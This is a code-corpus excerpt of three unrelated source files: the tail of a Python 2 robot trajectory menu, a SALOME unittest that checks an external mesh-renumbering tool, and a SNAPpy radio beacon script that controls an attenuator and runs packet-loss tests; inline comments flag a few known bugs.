        0.65, #J0
        0.65, #J1
        0.65]}#J2
#Deg/S
# Per-chain average joint velocities for splined trajectories (degrees/second).
vel_avg={
    'right_arm':[
        40.0, #J0
        40.0, #J1
        40.0, #J2
        40.0, #J3
        40.0, #J4
        40.0, #J5
        40.0],#J6
    'left_arm':[
        40.0, #J0
        40.0, #J1
        40.0, #J2
        40.0, #J3
        40.0, #J4
        40.0, #J5
        40.0],#J6
    'torso':[
        5.0, #J0
        5.0, #J1
        5.0]}#J2
# User-adjustable multipliers applied on top of the defaults above.
scale_stiffness={'right_arm': 1.0,'left_arm':1.0,'torso':1.0}
scale_vel_avg={'right_arm': 1.0,'left_arm':1.0,'torso':1.0}
use_theta_gc=True
# ######################################################
# Interactive main menu loop: record/load via points, tune stiffness and
# velocity scaling, and execute splined trajectories on the selected chains.
vias={}
for c in chains:
    vias[c]=[]
while True:
    proxy.step()
    print '--------------'
    #print 'p: execute splined vias (python)'
    print 'e: execute trajectory (rt)'
    #print 'm: execute minimum jerk'
    #print 'd: execute direct THETA_GC mode'
    print 'l: load via file'
    print 'd: display vias'
    print 'v: scale avg velocity'
    print 's: set stiffness'
    print 'm: set control mode'
    print 'q: quit'
    print '--------------'
    print
    k=m3t.get_keystroke()
    print
    if k=='q':
        break
    if k=='r':
        # NOTE(review): record_vias is not defined in this file; pressing 'r'
        # would raise NameError. Presumably left over from an older version.
        vias=record_vias()
    if k=='l':
        v=load_vias()
        for c in chains:
            vias[c]=v[c]['postures']
    if k=='m':
        print 'Use mode THETA_GC [y]?'
        use_theta_gc= m3t.get_yes_no('y')
    if k=='d':
        # Display current mode, scaling factors and recorded vias.
        print '-------- Mode ---------'
        if use_theta_gc:
            print 'Currently in mode: THETA_GC'
        else:
            print 'Currently in mode: THETA'
        print '------ Scaling --------'
        print 'Stiffness: ',stiffness
        print 'Vel avg: ',scale_vel_avg
        print '--------- Vias --------'
        print vias
    if k=='v':
        # Adjust the per-chain average-velocity multiplier (clamped to 0..2).
        print 'Select chain'
        c = m3t.user_select_components_interactive(chains,single=True)[0]
        print 'Current scale for',c,': ',scale_vel_avg[c]
        print 'New scale: (0-2.0)'
        scale_vel_avg[c]=max(0,min(2.0,m3t.get_float()))
    if k=='s':
        # Set a uniform stiffness for all joints of one chain (clamped to 0..1).
        print 'Current stiffness'
        print '--------------------'
        for c in chains:
            print c,' : ',stiffness[c]
        print
        print 'Select chain'
        c = m3t.user_select_components_interactive(chains,single=True)[0]
        print 'Enter stiffness: '
        s=max(0,min(1.0,m3t.get_float()))
        stiffness[c]=[s]*len(stiffness[c])
        print 'New stiffness: ',c,' : ',stiffness[c]
    if k=='e':
        # Queue the recorded vias on each selected chain and run the
        # realtime splined trajectory until every chain reports completion.
        use_chain={}
        done=True
        for c in chains:
            print 'Use ',c,'[y]?'
            use_chain[c]= m3t.get_yes_no('y')
            if use_chain[c] and len(vias[c]):
                ndof=bot.get_num_dof(c)
                done=False
                for v in vias[c]:
                    print 'Adding via',v,'for',c
                    va=nu.array(vel_avg[c])*scale_vel_avg[c]
                    bot.add_splined_traj_via_deg(c,v,va)
                #bot.add_splined_traj_via_deg(c,[0.0]*ndof,va) #return home
                #print 'Adding via',[0.0]*ndof,'for',c
                if use_theta_gc:
                    bot.set_mode_splined_traj_gc(c)
                    ss=[max(0.0,min(1.0,scale_stiffness[c]*x)) for x in stiffness[c]]
                    bot.set_stiffness(c,ss)
                else:
                    bot.set_mode_splined_traj(c)
                bot.set_slew_rate_proportion(c, [1.0]*ndof)
        ts=time.time()
        print 'Hit enter when ready...'
        raw_input()
        while not done:
            done=True
            for c in chains:
                if use_chain[c] and not bot.is_splined_traj_complete(c):
                    done=False
            print 'Running...',time.time()-ts
            proxy.step()
            if rviz == True:
                viz.step()
            time.sleep(0.1)
        time.sleep(1.0)
        for c in chains:
            bot.set_mode_off(c)
        proxy.step()
    if k=='p':
        # Dead branch: python-side spline execution, kept commented out.
        if len(vias):
            pass
            #ndof=bot.get_num_dof(arm_name)
            #jt = m3jt.JointTrajectory(ndof)
            #for v in vias:
            #print 'Adding via',v
            #jt.add_via_deg(v, [vel_avg]*ndof)
            #print 'Adding via',[0.0]*ndof
            #jt.add_via_deg([0.0]*ndof, [vel_avg]*ndof)
            #bot.set_motor_power_on()
            #bot.set_mode_theta_gc(arm_name)
            #bot.set_stiffness(arm_name,[stiffness]*ndof)
            #ts=time.time()
            #jt.start([0]*ndof, [0]*ndof)
            #print 'hit any key to start!'
            #z=m3t.get_keystroke()
            #while not jt.is_splined_traj_complete():
            #q = jt.step()
            #print q
            #bot.set_theta_deg(arm_name, q)
            #proxy.step()
            #ros_publish()
            #print 'Running...',time.time()-ts
            #time.sleep(0.1)
            #proxy.pretty_print_component('m3sea_wrist_ma2_j6')#chain.name)
# Shutdown: stop the realtime proxy and visualiser.
proxy.stop()
if rviz == True:
    viz.stop()
# ######################################################
|
unknown
|
codeparrot/codeparrot-clean
| ||
#!/usr/bin/env python
# -*- coding: iso-8859-1 -*-
# Copyright (C) 2007-2014 CEA/DEN, EDF R&D
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
# See http://www.salome-platform.org/ or email : webmaster.salome@opencascade.com
#
from MEDLoader import *
import os
import sys
import unittest
class RenumberingTest(unittest.TestCase):
    """Integration tests for the external MED ``renumber`` command-line tool.

    Each test shells out to the ``renumber`` binary on a reference MED file,
    reloads the renumbered mesh with MEDLoader, and compares nodal
    connectivity (and, for testBoost2D, the cell field values) against
    hard-coded expected arrays.  Methods spelled ``tess...`` are deliberately
    misnamed so unittest does not collect them ("not activated yet").
    """
    def testBoost2D(self):
        # 2D quad mesh renumbered with the BOOST (reverse Cuthill-McKee) method.
        filename="Test2D.med"
        meshname="Mesh_1"
        method="BOOST"
        string_to_execute=self.dir_renumber+" "+self.dir_mesh+"/"+filename+" "+meshname+" "+method+" "+self.dir_mesh+"/out_"+filename
        os.system(string_to_execute)
        mm=MEDFileMesh.New(self.dir_mesh+"/out_"+filename,meshname)
        m=mm.getMeshAtLevel(0)
        ff=MEDFileField1TS(self.dir_mesh+"/out_"+filename,"Test field")
        # Expected cell field values after renumbering (2 components per cell).
        field_ini=DataArrayDouble([(2,3),(12,13),(14,15),(4,5),(6,7),(8,9),(16,17),(0,1),(10,11)])
        ff.getFieldOnMeshAtLevel(ON_CELLS,0,mm)
        f=ff.getFieldOnMeshAtLevel(ON_CELLS,0,mm)
        field=f.getArray().isEqual(field_ini,1e-15)
        connectivite=[4,1,5,12,10,4,10,12,13,11,4,5,4,14,12,4,11,13,9,3,4,12,14,15,13,4,4,0,6,14,4,13,15,8,9,4,14,6,7,15,4,15,7,2,8]
        connectivite_index=[0,5,10,15,20,25,30,35,40,45]
        Boost2D=m.getNodalConnectivity().getValues()==connectivite and m.getNodalConnectivityIndex().getValues()==connectivite_index and field
        self.assertTrue(Boost2D)
        os.remove(self.dir_mesh+"/out_"+filename)
        pass
    def tessMetis2D(self):#not activated yet
        # METIS renumbering of the same 2D mesh, via the legacy MESH API.
        filename="Test2D.med"
        meshname="Mesh_1"
        method="METIS"
        string_to_execute=self.dir_renumber+" "+self.dir_mesh+"/"+filename+" "+meshname+" "+method+" "+self.dir_mesh+"/out_"+filename
        os.system(string_to_execute)
        m = MESH(MED_DRIVER,self.dir_mesh+"/out_"+filename,meshname)
        nbcell2dmetis=m.getNumberOfElements(MED_CELL,MED_ALL_ELEMENTS)
        connectivite=[12,14,10,4,2,6,13,11,11,13,14,12,16,8,3,9,5,1,7,15,15,7,8,16,14,16,9,10,6,5,15,13,13,15,16,14]
        connectivite_index=[1,5,9,13,17,21,25,29,33,37]
        conn=m.getConnectivity(MED_NODAL,MED_CELL,MED_QUAD4)
        conn_index=m.getConnectivityIndex(MED_NODAL,MED_CELL);
        conn2dmetis=(list(conn)==connectivite)
        conn_index2dmetis=(list(conn_index)==connectivite_index)
        Metis2D=conn2dmetis and conn_index2dmetis and (nbcell2dmetis==9)
        self.assertTrue(Metis2D)
        os.remove(self.dir_mesh+"/out_"+filename)
        pass
    def testBoost2DPolygon(self):
        # BOOST renumbering on a 2D polygonal mesh.
        filename="Test2Dpoly.med"
        meshname="Mesh_1"
        method="BOOST"
        string_to_execute=self.dir_renumber+" "+self.dir_mesh+"/"+filename+" "+meshname+" "+method+" "+self.dir_mesh+"/out_"+filename
        os.system(string_to_execute)
        mm=MEDFileMesh.New(self.dir_mesh+"/out_"+filename,meshname)
        m=mm.getMeshAtLevel(0)
        nbcell2dpolyboost=m.getNumberOfCells()
        connectivite=[5,1,4,8,9,5,10,9,8,11,5,4,5,7,8,5,3,10,11,15,5,11,8,7,12,5,5,0,6,7,5,15,11,12,14,5,12,7,6,13,5,14,12,13,2]
        connectivite_index=[0,5,10,15,20,25,30,35,40,45]
        conn=m.getNodalConnectivity().getValues()
        conn_index=m.getNodalConnectivityIndex().getValues()
        conn2dpolyboost=(list(conn)==connectivite)
        conn_index2dpolyboost=(list(conn_index)==connectivite_index)
        PolyBoost2D=conn2dpolyboost and conn_index2dpolyboost and (nbcell2dpolyboost==9)
        self.assertTrue(PolyBoost2D)
        os.remove(self.dir_mesh+"/out_"+filename)
        pass
    def tessMetis2DPolygon(self):#not activated yet
        # METIS renumbering on a 2D polygonal mesh, via the legacy MESH API.
        filename="Test2Dpoly.med"
        meshname="Mesh_1"
        method="METIS"
        string_to_execute=self.dir_renumber+" "+self.dir_mesh+"/"+filename+" "+meshname+" "+method+" "+self.dir_mesh+"/out_"+filename
        os.system(string_to_execute)
        m = MESH(MED_DRIVER,self.dir_mesh+"/out_"+filename,meshname)
        nbcell2dpolymetis=m.getNumberOfElements(MED_CELL,MED_ALL_ELEMENTS)
        connectivite=[6,1,7,8,2,5,9,10,5,6,8,9,15,13,14,3,4,11,12,16,16,12,13,15,11,10,9,12,12,9,8,13,13,8,7,14]
        connectivite_index=[1,5,9,13,17,21,25,29,33,37]
        conn=m.getConnectivity(MED_NODAL,MED_CELL,MED_POLYGON)
        conn_index=m.getConnectivityIndex(MED_NODAL,MED_CELL)
        conn2dpolymetis=(list(conn)==connectivite)
        conn_index2dpolymetis=(list(conn_index)==connectivite_index)
        PolyMetis2D=conn2dpolymetis and conn_index2dpolymetis and (nbcell2dpolymetis==9)
        self.assertTrue(PolyMetis2D)
        os.remove(self.dir_mesh+"/out_"+filename)
        pass
    def testBoost3D(self):
        # BOOST renumbering on a 3D hexahedral mesh.
        filename="Test3D.med"
        meshname="Mesh_1"
        method="BOOST"
        string_to_execute=self.dir_renumber+" "+self.dir_mesh+"/"+filename+" "+meshname+" "+method+" "+self.dir_mesh+"/out_"+filename
        os.system(string_to_execute)
        mm=MEDFileMesh.New(self.dir_mesh+"/out_"+filename,meshname)
        m=mm.getMeshAtLevel(0)
        nbcell3dboost=m.getNumberOfCells()
        connectivite=[18,22,12,4,17,26,21,13,25,18,16,5,12,22,24,15,21,26,18,26,21,13,25,23,14,6,19,18,8,22,17,0,20,26,25,9,18,24,15,21,26,18,7,14,23,18,1,16,22,8,11,24,26,20,18,20,26,25,9,10,23,19,2,18,11,24,26,20,3,18,23,10]
        connectivite_index=[0,9,18,27,36,45,54,63,72]
        conn=m.getNodalConnectivity().getValues()
        conn_index=m.getNodalConnectivityIndex().getValues()
        conn3dboost=(list(conn)==connectivite)
        conn_index3dboost=(list(conn_index)==connectivite_index)
        Boost3D=conn3dboost and conn_index3dboost and (nbcell3dboost==8)
        self.assertTrue(Boost3D)
        os.remove(self.dir_mesh+"/out_"+filename)
        pass
    def tessMetis3D(self):#not activated yet
        # METIS renumbering on the 3D hexahedral mesh, via the legacy MESH API.
        filename="Test3D.med"
        meshname="Mesh_1"
        method="METIS"
        string_to_execute=self.dir_renumber+" "+self.dir_mesh+"/"+filename+" "+meshname+" "+method+" "+self.dir_mesh+"/out_"+filename
        os.system(string_to_execute)
        m = MESH(MED_DRIVER,self.dir_mesh+"/out_"+filename,meshname)
        nbcell3dmetis=m.getNumberOfElements(MED_CELL,MED_ALL_ELEMENTS)
        connectivite=[12,25,27,21,4,19,24,11,27,22,14,26,24,15,7,20,17,6,13,23,25,16,22,27,9,23,18,1,21,27,26,10,23,13,5,18,27,22,14,26,25,16,22,27,19,8,15,24,2,17,23,9,12,25,27,21,21,27,26,10,11,24,20,3]
        connectivite_index=[1,9,17,25,33,41,49,57,65]
        conn=m.getConnectivity(MED_NODAL,MED_CELL,MED_HEXA8)
        conn_index=m.getConnectivityIndex(MED_NODAL,MED_CELL);
        conn3dmetis=(list(conn)==connectivite)
        conn_index3dmetis=(list(conn_index)==connectivite_index)
        Metis3D=conn3dmetis&conn_index3dmetis&(nbcell3dmetis==8)
        self.assertTrue(Metis3D)
        os.remove(self.dir_mesh+"/out_"+filename)
        pass
    def testBoost3DPoly(self):
        # BOOST renumbering on a 3D polyhedral mesh (-1 separates faces).
        filename="Test3Dpoly.med"
        meshname="Mesh_1"
        method="BOOST"
        string_to_execute=self.dir_renumber+" "+self.dir_mesh+"/"+filename+" "+meshname+" "+method+" "+self.dir_mesh+"/out_"+filename
        os.system(string_to_execute)
        mm=MEDFileMesh.New(self.dir_mesh+"/out_"+filename,meshname)
        m=mm.getMeshAtLevel(0)
        nbcell3dpolyboost=m.getNumberOfCells()
        connectivite=[31,22,12,4,17,-1,26,25,13,21,-1,22,26,21,12,-1,12,21,13,4,-1,4,13,25,17,-1,17,25,26,22,31,16,5,12,22,-1,24,26,21,15,-1,16,24,15,5,-1,5,15,21,12,-1,12,21,26,22,-1,22,26,24,16,31,26,21,13,25,-1,23,19,6,14,-1,26,23,14,21,-1,21,14,6,13,-1,13,6,19,25,-1,25,19,23,26,31,8,22,17,0,-1,20,9,25,26,-1,8,20,26,22,-1,22,26,25,17,-1,17,25,9,0,-1,0,9,20,8,31,24,15,21,26,-1,18,23,14,7,-1,24,18,7,15,-1,15,7,14,21,-1,21,14,23,26,-1,26,23,18,24,31,1,16,22,8,-1,11,20,26,24,-1,1,11,24,16,-1,16,24,26,22,-1,22,26,20,8,-1,8,20,11,1,31,20,26,25,9,-1,10,2,19,23,-1,20,10,23,26,-1,26,23,19,25,-1,25,19,2,9,-1,9,2,10,20,31,11,24,26,20,-1,3,10,23,18,-1,11,3,18,24,-1,24,18,23,26,-1,26,23,10,20,-1,20,10,3,11]
        connectivite_index=[0,30,60,90,120,150,180,210,240]
        conn=m.getNodalConnectivity().getValues()
        conn_index=m.getNodalConnectivityIndex().getValues()
        conn3dpolyboost=(connectivite==list(conn))
        conn_index3dpolyboost=(connectivite_index==list(conn_index))
        PolyBoost3D=(conn3dpolyboost and conn_index3dpolyboost and (nbcell3dpolyboost==8))
        self.assertTrue(PolyBoost3D)
        os.remove(self.dir_mesh+"/out_"+filename)
        pass
    def tessBoost3DPoly(self):#not activated yet
        # Despite the name this exercises METIS on the 3D polyhedral mesh.
        filename="Test3Dpoly.med"
        meshname="Mesh_1"
        method="METIS"
        string_to_execute=self.dir_renumber+" "+self.dir_mesh+"/"+filename+" "+meshname+" "+method+" "+self.dir_mesh+"/out_"+filename
        os.system(string_to_execute)
        m = MESH(MED_DRIVER,self.dir_mesh+"/out_"+filename,meshname)
        nbcell3dpolymetis=m.getNumberOfElements(MED_CELL,MED_ALL_ELEMENTS)
        connectivite=[12,25,27,21,-1,4,11,24,19,-1,12,4,19,25,-1,25,19,24,27,-1,27,24,11,21,-1,21,11,4,12,
                      27,22,14,26,-1,24,20,7,15,-1,27,24,15,22,-1,22,15,7,14,-1,14,7,20,26,-1,26,20,24,27,
                      17,6,13,23,-1,25,27,22,16,-1,17,25,16,6,-1,6,16,22,13,-1,13,22,27,23,-1,23,27,25,17,
                      9,23,18,1,-1,21,10,26,27,-1,9,21,27,23,-1,23,27,26,18,-1,18,26,10,1,-1,1,10,21,9,
                      23,13,5,18,-1,27,26,14,22,-1,23,27,22,13,-1,13,22,14,5,-1,5,14,26,18,-1,18,26,27,23,
                      25,16,22,27,-1,19,24,15,8,-1,25,19,8,16,-1,16,8,15,22,-1,22,15,24,27,-1,27,24,19,25,
                      2,17,23,9,-1,12,21,27,25,-1,2,12,25,17,-1,17,25,27,23,-1,23,27,21,9,-1,9,21,12,2,
                      21,27,26,10,-1,11,3,20,24,-1,21,11,24,27,-1,27,24,20,26,-1,26,20,3,10,-1,10,3,11,21]
        connectivite_index=[1, 30, 59, 88, 117, 146, 175, 204, 233]
        conn=m.getConnectivity(MED_NODAL,MED_CELL,MED_POLYHEDRA)
        conn_index=m.getConnectivityIndex(MED_NODAL,MED_CELL);
        conn3dpolymetis=(list(conn)==connectivite)
        conn_index3dpolymetis=(list(conn_index)==connectivite_index)
        PolyMetis3D=(conn3dpolymetis and conn_index3dpolymetis and (nbcell3dpolymetis==8))
        self.assertTrue(PolyMetis3D)
        os.remove(self.dir_mesh+"/out_"+filename)
        pass
    def setUp(self):
        # Locate the renumber binary and the resource meshes depending on
        # how the test is being run (make test, installed, or in-source).
        srcdir = os.getenv("srcdir")
        med_root = os.getenv("MED_ROOT_DIR")
        if srcdir:
            # make test is being performed
            self.dir_renumber="./renumber"
            self.dir_mesh = os.path.join( srcdir, "../../resources")
        elif med_root:
            # hope renumber has been already installed
            self.dir_renumber=os.path.join( med_root, "bin/salome/renumber")
            self.dir_mesh = os.path.join( med_root, "share/salome/resources/med")
        else:
            # initial version
            self.dir_renumber="../../../MED_INSTALL/bin/salome/renumber"
            self.dir_mesh="../../resources"
            pass
        pass
    pass
# Guard the test runner so importing this module does not execute the suite
# (bare unittest.main() raises SystemExit even on import).
if __name__ == "__main__":
    unittest.main()
|
unknown
|
codeparrot/codeparrot-clean
| ||
# -*- coding: utf-8 -*-
"""
This script contains the beacon server.
This script should be programmed to the RF200 of the whisper box.
@author: albert
"""
from atmega128rfa1_math import *
from atmega128rfa1_temperature import *
from synapse.RF200 import *
# Attenuator wiring types (see set_att()).
ATT_SERIAL = 1
ATT_DOUBLE_SERIAL = 2 # TBD not yet supported
ATT_PARALLEL = 3
# --- RF test state (module globals, SNAPpy style) ---
g_send_period = 14 # 14ms is the default
g_att = 0 # attenuation currently set (0..31)
# NOTE(review): set_att() clocks out 6 bits (att & 32), so the usable
# range may actually be 0..63 -- confirm against the attenuator datasheet.
g_test_att = 0 # attenuation to be used for test packet (0..31)
g_test_tx_pwr = 17 # tx power to be used for test packets (0..17)
g_send_delay = 1 # ms
g_send_delay_default = 100
g_send_packets_remaining = 0
g_target_node = None
g_receive_count = 0     # also used as a negative sentinel while a request is pending
g_receive_count_old = 0
g_receive_target_count = 0
g_not_received_time = 0
g_receive_timeout = 600
g_lq_sum = None         # 32-bit string number from atmega128rfa1_math
g_last_ping_time = 0
g_multi_att_min = 0     # binary-search bounds for tx_multi_test()
g_multi_att_max = 0
g_packets_per_test = 100
g_post_send_delay = 0
g_send_me_time = None   # getMs() timestamps for RPC retry logic (None = no request pending)
g_receive_me_time = None
g_send_receive_results_time = None
g_att_type = None # attenuator type
# GPIO mapping for the attenuator control lines.
PIN_C0_5 = GPIO_16
PIN_C1 = GPIO_15
PIN_C2 = GPIO_14
PIN_C4 = GPIO_13
PIN_C8 = GPIO_18
PIN_C16 = GPIO_17
PIN_LE = GPIO_12
PIN_CLK = PIN_C8
PIN_DATA = PIN_C16
def set_att_type(att_type):
    """Select the attenuator wiring (ATT_SERIAL / ATT_PARALLEL)."""
    global g_att_type
    g_att_type = att_type
def beacon_server_init():
    """Reset the attenuator to 0 at start-up."""
    set_att(0)
def request_send_me():
    """Broadcast a 'send_me' RPC asking the target node to stream test
    packets back at us; records the request time for retry handling."""
    global g_target_node, g_packets_per_test, g_send_delay
    global g_send_period, g_test_tx_pwr, g_send_me_time, g_receive_count
    g_receive_count = -3  # sentinel: send_me request outstanding
    set_att(0)
    txPwr(17)
    mcastRpc(1, 1, 'send_me', g_target_node, g_packets_per_test,
             g_send_delay, g_send_period, g_test_tx_pwr)
    g_send_me_time = getMs()
def request_receive_results():
    """Broadcast a request for the target node's receive statistics."""
    global g_send_receive_results_time, g_target_node, g_receive_count
    g_receive_count = -2  # sentinel: results request outstanding
    set_att(0)
    txPwr(17)
    mcastRpc(1, 1, 'send_receive_results', g_target_node)
    g_send_receive_results_time = getMs()
def request_receive_me():
    """Broadcast a 'receive_me' RPC asking the target node to count our
    test packets; records the request time for retry handling."""
    global g_receive_me_time, g_target_node
    global g_packets_per_test, g_receive_count
    g_receive_count = -1  # sentinel: receive_me request outstanding
    set_att(0)
    txPwr(17)
    mcastRpc(1, 1, 'receive_me', g_target_node, g_packets_per_test)
    g_receive_me_time = getMs()
# @setHook(HOOK_1S)
# def do_every_1s(tick):
# mcastRpc(1, 1, 'beep')
def beacon_server_tick(tick):
    """Periodic driver for the RF test state machine.

    Paces test-packet transmission, monitors receive progress and
    timeouts, advances the binary attenuation search, and retries
    unanswered RPC requests after 200ms.  `tick` is a millisecond
    timestamp compared against stored getMs() values.
    """
    global g_send_packets_remaining
    global g_pong_seq
    global g_send_delay
    global g_send_period
    global g_not_received_time
    global g_receive_target_count
    global g_receive_count
    global g_receive_count_old
    global g_multi_att_min
    global g_multi_att_max
    global g_receive_timeout
    global g_target_node
    global g_post_send_delay
    global g_test_tx_pwr
    global g_last_ping_time
    global g_send_me_time
    global g_receive_me_time
    global g_send_receive_results_time
    # Pre-send countdown: when it expires, arm attenuator and tx power.
    if g_send_delay > 0:
        g_send_delay -= 1
        if g_send_delay == 0:
            set_att(g_test_att)
            # at the end of the delay cycle setup the transmit power
            txPwr(g_test_tx_pwr)
        return
    # Transmit phase: emit one ping per g_send_period ms.
    if g_send_packets_remaining > 0:
        if (tick - g_last_ping_time) >= g_send_period:
            g_last_ping_time = tick
            mcastRpc(1, 1, 'ping')
            g_send_packets_remaining -= 1
            if g_send_packets_remaining == 0:
                g_post_send_delay = g_send_delay_default
    # After the last ping, wait a bit and then ask for receive statistics.
    if g_post_send_delay > 0:
        g_post_send_delay -= 1
        if g_post_send_delay == 0:
            request_receive_results()
    # Receive phase: watch progress toward the expected packet count.
    if g_receive_target_count > 0:
        if g_receive_count > g_receive_count_old:
            g_not_received_time = 0
            g_receive_count_old = g_receive_count
        if g_receive_count >= g_receive_target_count:
            # all the packets arrived
            # print 'cnt:', g_receive_count, '/', g_receive_target_count, ' lq:', get_lq_sum()
            #mcastRpc(1, 1, 'receive_count', g_receive_count)
            # Full success: raise the lower bound of the attenuation search.
            if g_multi_att_min < g_multi_att_max:
                g_multi_att_min = 1 + (
                    (g_multi_att_min + g_multi_att_max) / 2)
                # print "multitest ", g_multi_att_min, ' ', g_multi_att_max
                if g_multi_att_min < g_multi_att_max:
                    # NOTE(review): tx_test() is defined with 6 parameters but
                    # called here with 3 -- this raises a TypeError if reached;
                    # confirm the intended signature.
                    tx_test(
                        g_target_node,
                        (g_multi_att_min + g_multi_att_max) / 2,
                        g_test_tx_pwr)
            g_receive_target_count = 0
        else:
            g_not_received_time += 1
            if g_not_received_time >= g_receive_timeout:
                # timeout happened
                # print 'timeout ', g_receive_count
                # 'cnt:', g_receive_count, '/', g_receive_target_count, ' lq:', get_lq_sum()
                #mcastRpc(1, 1, 'receive_count', g_receive_count)
                # Timeout: narrow the search depending on how many arrived.
                if g_multi_att_min < g_multi_att_max:
                    if g_receive_count > (g_receive_target_count / 2):
                        g_multi_att_min = 1 + (
                            (g_multi_att_min + g_multi_att_max) / 2)
                    else:
                        g_multi_att_max = (
                            g_multi_att_min + g_multi_att_max) / 2
                    # print "multitest ", g_multi_att_min, ' ', g_multi_att_max
                    if g_multi_att_min < g_multi_att_max:
                        # NOTE(review): same 3-arg tx_test() call as above.
                        tx_test(
                            g_target_node,
                            (g_multi_att_min + g_multi_att_max) / 2,
                            g_test_tx_pwr)
                g_receive_target_count = 0
    # Retry outstanding RPC requests that got no answer within 200ms.
    if g_send_me_time is not None:
        if (tick - g_send_me_time) > 200:
            request_send_me()
    if g_receive_me_time is not None:
        if (tick - g_receive_me_time) > 200:
            request_receive_me()
    if g_send_receive_results_time is not None:
        if (tick - g_send_receive_results_time) > 200:
            request_receive_results()
def set_att(att):
    """Program the attenuator hardware to `att`.

    ATT_SERIAL: bit-bangs 6 bits MSB-first (att & 32 down to att & 1) on
    PIN_DATA/PIN_CLK, then pulses PIN_LE to latch.
    ATT_PARALLEL: drives one GPIO per bit, then pulses PIN_LE.
    NOTE(review): writePin is given masked values like (att & 16), i.e.
    nonzero ints rather than booleans -- presumably treated as truthy by
    SNAPpy; confirm.
    """
    global g_att
    g_att = att
    if g_att_type == ATT_SERIAL:
        # serial
        setPinDir(PIN_CLK, True)
        setPinDir(PIN_DATA, True)
        setPinDir(PIN_LE, True)
        writePin(PIN_CLK, False)
        writePin(PIN_DATA, False)
        writePin(PIN_LE, False)
        writePin(PIN_DATA, att & 32)
        writePin(PIN_CLK, True)
        writePin(PIN_CLK, False)
        writePin(PIN_DATA, att & 16)
        writePin(PIN_CLK, True)
        writePin(PIN_CLK, False)
        writePin(PIN_DATA, att & 8)
        writePin(PIN_CLK, True)
        writePin(PIN_CLK, False)
        writePin(PIN_DATA, att & 4)
        writePin(PIN_CLK, True)
        writePin(PIN_CLK, False)
        writePin(PIN_DATA, att & 2)
        writePin(PIN_CLK, True)
        writePin(PIN_CLK, False)
        writePin(PIN_DATA, att & 1)
        writePin(PIN_CLK, True)
        writePin(PIN_CLK, False)
        # latch the shifted-in value
        writePin(PIN_LE, True)
        writePin(PIN_LE, False)
        return
    elif g_att_type == ATT_PARALLEL:
        # parallel
        setPinDir(PIN_C0_5, True)
        writePin(PIN_C0_5, att & 1)
        setPinDir(PIN_C1, True)
        writePin(PIN_C1, att & 2)
        setPinDir(PIN_C2, True)
        writePin(PIN_C2, att & 4)
        setPinDir(PIN_C4, True)
        writePin(PIN_C4, att & 8)
        setPinDir(PIN_C8, True)
        writePin(PIN_C8, att & 16)
        setPinDir(PIN_C16, True)
        writePin(PIN_C16, att & 32)
        setPinDir(PIN_LE, True)
        writePin(PIN_LE, False)
        writePin(PIN_LE, True)
def get_att():
    """Return the currently programmed attenuation value."""
    # Reading a module global needs no `global` declaration.
    return g_att
def set_packets_per_test(packets_per_test):
    """Set how many test packets each tx/rx test sends."""
    global g_packets_per_test
    g_packets_per_test = packets_per_test
def get_packets_per_test():
    """Return how many test packets each tx/rx test sends."""
    # Reading a module global needs no `global` declaration.
    return g_packets_per_test
def send_me(target_node, packets_to_send, send_delay, send_period, test_tx_pwr):
    """RPC entry point: if we are the addressed node, start streaming
    test packets back to whoever sent this request."""
    if target_node == localAddr():
        send_start(rpcSourceAddr(), packets_to_send, send_delay,
                   send_period, test_tx_pwr)
def send_start(target_node, packets_to_send, send_delay, send_period, test_tx_pwr):
    """Arm the transmit side: store the test parameters and acknowledge
    with a 'send_started' broadcast (sent at full power)."""
    global g_pong_seq, g_target_node, g_send_packets_remaining
    global g_send_delay, g_send_period, g_test_tx_pwr
    g_target_node = target_node
    g_send_delay = send_delay
    g_send_period = send_period
    g_send_packets_remaining = packets_to_send
    g_test_tx_pwr = test_tx_pwr
    txPwr(17)
    mcastRpc(1, 1, 'send_started', packets_to_send)
def send_started(receive_target_count):
    """RPC ack from the sender: it is about to transmit, so cancel the
    pending send_me retry and arm our receiver."""
    global g_target_node, g_test_att, g_send_me_time
    if rpcSourceAddr() == g_target_node:
        g_send_me_time = None
        set_att(g_test_att)
        receive_start(g_target_node, receive_target_count)
def receive_me(target_node, receive_target_count):
    """RPC entry point: if addressed to us, start counting packets from
    the requesting node."""
    if target_node == localAddr():
        receive_start(rpcSourceAddr(), receive_target_count)
def receive_start(target_node, receive_target_count):
    """Reset the receive counters/statistics and start expecting
    `receive_target_count` pings from `target_node`."""
    global g_target_node, g_receive_count, g_receive_count_old
    global g_receive_target_count, g_lq_sum, g_not_received_time
    g_target_node = target_node
    g_receive_count = 0
    g_receive_count_old = 0
    g_not_received_time = 0
    g_receive_target_count = receive_target_count
    g_lq_sum = itos(0)
#def ping(target_node, seq):
# """if pinged pong out the link quality"""
# if target_node == localAddr():
# mcastRpc(1, 1, 'pong', getLq(), seq)
def ping():
    """receive this test packet if sent by target node

    Increments the receive counter and accumulates link quality into the
    32-bit string accumulator g_lq_sum.
    """
    global g_target_node
    global g_receive_count
    global g_lq_sum
    if rpcSourceAddr() == g_target_node:
        g_receive_count += 1
        g_lq_sum = add_32(g_lq_sum, itos(getLq()))
def tx_test(target_node, test_att, test_tx_pwr, packets_per_test, send_period, send_delay):
    """
    tx test ends when expected number of received packets arrived
    or timeout even happened
    timeout is when no packets have received for
    at least the duration of the timeout's length
    default timeout is 100ms

    Stores all test parameters in module globals, arms the receiver for
    `packets_per_test` packets, and asks the target node to transmit.
    NOTE(review): beacon_server_tick() and tx_multi_test() call this with
    only 3 arguments, which would raise a TypeError -- confirm whether the
    last three parameters were meant to be optional.
    """
    global g_test_att
    global g_test_tx_pwr
    global g_target_node
    global g_receive_count
    global g_lq_sum
    global g_send_period
    global g_packets_per_test
    global g_send_delay_default
    global g_receive_target_count
    # print 'txtest att:', test_att, ' pwr:', test_tx_pwr
    g_receive_target_count = 0
    g_receive_count = 0
    g_lq_sum = itos(0)
    g_target_node = target_node
    g_test_att = test_att
    g_test_tx_pwr = test_tx_pwr
    g_packets_per_test = packets_per_test
    g_send_period = send_period
